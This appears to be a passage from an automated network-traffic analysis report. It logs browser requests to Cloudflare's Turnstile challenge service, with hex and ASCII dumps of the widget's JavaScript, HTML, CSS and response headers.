                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 6b 65 28 73 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 73 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 73 2e 63 6f 64 65 3d 75 2c 73 7d 72 65 74 75 72 6e 20 74 7d 28 4c 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 72 29 7b 76 61 72 20 74 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 59 74 28 74 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73
                                                                                  Data Ascii: ke(s),"code",void 0),s.name="TurnstileError",s.code=u,s}return t}(Le(Error));function v(e,r){var t="[Cloudflare Turnstile] ".concat(e,".");throw new Yt(t,r)}function _(e){console.warn("[Cloudflare Turnstile] ".concat(e,"."))}function be(e){return e.starts
                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 2e 63 6f 6e 63 61 74 28 53 29 29 3b 69 66 28 21 55 29 7b 64 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e 69 6e 67 7c 7c 28 5f 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 57 69 64 67 65 74 20 22 2e 63 6f 6e 63 61 74 28 53 2c 22 2c 20 63 6f 6e 73 69 64 65 72 20 75 73 69 6e 67 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6d 6f 76 65 28 29 20 74 6f 20 63 6c 65 61 6e 20 75 70 20 61 20 77 69 64 67 65 74 2e 22 29 29 2c 64 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e 69 6e 67 3d 21 30 29 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 28 64 2e 69 73 45 78 65 63 75 74 69 6e 67 7c 7c 21 64 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 7c 7c 64 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 26 26 21 64 2e 69 73 53 74 61
                                                                                  Data Ascii: .concat(S));if(!U){d.watchcat.missingWidgetWarning||(_("Cannot find Widget ".concat(S,", consider using turnstile.remove() to clean up a widget.")),d.watchcat.missingWidgetWarning=!0);continue}if((d.isExecuting||!d.isInitialized||d.isInitialized&&!d.isSta
                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 66 75 6e 63 74 69 6f 6e 20 73 74 28 65 2c 72 29 7b 76 61 72 20 74 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 72 29 7b 76 61
                                                                                  Data Ascii: eyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}function st(e,r){var t="https://challenges.cloudflare.com";if(r){va
                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 33 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3e 72 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 72 29 3a 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 4a 74 28 65 29 7b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 69 66 28 21 74 7c 7c 74 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 42 4f 44 59 22 29 72 65 74 75 72 6e 20 6f 3b 66 6f 72 28 76 61 72 20 75 3d 31 2c 73 3d 74 2e 70 72 65 76 69 6f 75 73 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 3b 73 3b 29 73 2e 74 61 67 4e 61 6d 65 3d 3d 3d 74 2e 74 61 67 4e 61 6d 65 26 26 75 2b 2b 2c 73 3d 73 2e 70 72 65 76 69 6f 75 73 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e
                                                                                  Data Ascii: ments.length>1&&arguments[1]!==void 0?arguments[1]:3;return e.length>r?e.substring(0,r):e};function Jt(e){var r=function(t,o){if(!t||t.tagName==="BODY")return o;for(var u=1,s=t.previousElementSibling;s;)s.tagName===t.tagName&&u++,s=s.previousElementSiblin


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.1749713104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:58 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  Referer: https://efe.q39r.com/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:59 UTC1084INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:22:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  origin-agent-cluster: ?1
                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  document-policy: js-profiling
                                                                                  cross-origin-embedder-policy: require-corp
                                                                                  referrer-policy: same-origin
                                                                                  cross-origin-opener-policy: same-origin
                                                                                  2024-04-25 16:22:59 UTC394INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 61 75 74 6f 70 6c 61 79 3d 28 29 2c 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 29 2c 63 61 6d 65 72 61 3d 28 29 2c 63 6c 69 70 62 6f 61 72 64 2d 72 65 61 64 3d 28 29 2c 63 6c 69 70 62 6f 61 72 64 2d 77 72 69 74 65 3d 28 29 2c 67 65 6f 6c 6f 63 61 74 69 6f 6e 3d 28 29 2c 67 79 72 6f 73 63 6f 70 65 3d 28 29 2c 68 69 64 3d 28 29 2c 69 6e 74 65 72 65 73 74 2d 63 6f 68 6f 72 74 3d 28 29 2c 6d 61 67 6e 65 74 6f 6d 65 74 65 72 3d 28 29 2c 6d 69 63 72 6f 70 68 6f 6e 65 3d 28 29 2c 70 61 79 6d 65 6e 74 3d 28 29 2c 70 75 62 6c 69 63 6b 65 79 2d 63 72 65 64 65 6e 74 69 61 6c 73 2d 67 65 74 3d 28 29 2c 73 63 72 65 65 6e 2d 77 61 6b 65 2d 6c 6f 63 6b
                                                                                  Data Ascii: permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 32 37 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c
                                                                                  Data Ascii: 2700<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scal
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 72 6f 62 6f 74 6f 2c 20 6f 78 79 67 65 6e 2c 20 75 62 75 6e 74 75 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72
                                                                                  Data Ascii: kground-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont, "Segoe UI", roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-ser
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20
                                                                                  Data Ascii: px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterlimit: 10;}#success-icon .p1
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63
                                                                                  Data Ascii: lenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .ctp-checkbox-label .mark { border: 2px solid #dadada; background-color: #222;}.theme-dark .ctp-checkbox-label input:focus ~ .mark, .theme-dark .c
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68
                                                                                  Data Ascii: rder-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .th
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 72 3a 20 23 66 61 66 61 66 61 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61
                                                                                  Data Ascii: r: #fafafa;}#challenge-overlay,#challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overla
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 73 70 61 6e 2e 63 74 70 2d 6c 61 62 65 6c 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 74 70 2d 6c 61 62 65 6c 20 7b 0a 20 20 74 65 78
                                                                                  Data Ascii: ~ .mark { border: 2px solid #c44d0e;}.ctp-checkbox-label input:active ~ span.ctp-label { text-decoration: underline;}.ctp-checkbox-label input:focus ~ .mark { border: 2px solid #c44d0e;}.ctp-checkbox-label input:focus ~ span.ctp-label { tex
                                                                                  2024-04-25 16:22:59 UTC409INData Raw: 70 61 63 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a
                                                                                  Data Ascii: pacer { margin-right: 3px; margin-left: 3px;}.size-compact .ctp-checkbox-container { text-align: left;}.size-compact #logo { margin-top: 5px; margin-bottom: 0; height: 22px;}.size-compact .cb-container { margin-top: 3px; margin-left:
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 33 30 38 38 0d 0a 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a
                                                                                  Data Ascii: 3088 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.size-compact #challenge-error-title { margin-top: 3px; width: auto;}.size-compact #fail { display:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.1749714104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:59 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=879faccbfe8fb06a HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:59 UTC358INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:22:59 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  vary: accept-encoding
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879faccf4ce04545-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:22:59 UTC1011INData Raw: 34 31 32 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 78 2c 66 45 2c 66 46 2c 66 49 2c 66 4a 2c 67 39 2c 67 61 2c 67 68 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 66 2c 68 72 2c 68 45 2c 68 4a 2c 68 4b 2c 68
                                                                                  Data Ascii: 412window._cf_chl_opt.uaO=false;~function(ix,fE,fF,fI,fJ,g9,ga,gh,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,hf,hr,hE,hJ,hK,h
                                                                                  2024-04-25 16:22:59 UTC38INData Raw: 39 28 32 38 35 32 29 5d 28 73 29 3a 66 5b 6a 39 28 31 33 33 34 29 5d 28 6a 39 28 31 30 32 31 29 2c 67 2c 68 0d 0a
                                                                                  Data Ascii: 9(2852)](s):f[j9(1334)](j9(1021),g,h
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 32 30 65 37 0d 0a 29 7d 29 2c 66 3d 66 45 5b 6a 38 28 33 32 38 36 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 6a 38 28 32 38 35 32 29 5d 28 2b 2b 69 29 29 3b 6b 5b 6a 38 28 32 39 34 30 29 5d 28 53 74 72 69 6e 67 5b 6a 38 28 32 34 31 35 29 5d 28 28 68 5b 6a 38 28 37 33 33 29 5d 28 32 35 35 26 6d 2c 6a 29 2d 69 25 36 35 35 33 35 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 6a 38 28 37 30 39 29 5d 28 27 27 29 7d 2c 67 61 3d 66 75 6e 63 74 69 6f 6e 28 6a 61 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 61 3d 69 78 2c 64 3d 7b 27 63 59 62 73 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 68 28 69 2c 6a 29 7d 2c 27 76 69 55 52 50 27 3a 66 75 6e 63 74 69 6f 6e
                                                                                  Data Ascii: 20e7)}),f=fE[j8(3286)](f),k=[],i=-1;!isNaN(m=f[j8(2852)](++i));k[j8(2940)](String[j8(2415)]((h[j8(733)](255&m,j)-i%65535+65535)%255)));return k[j8(709)]('')},ga=function(ja,d,e,f,g){return ja=ix,d={'cYbsy':function(h,i,j){return h(i,j)},'viURP':function
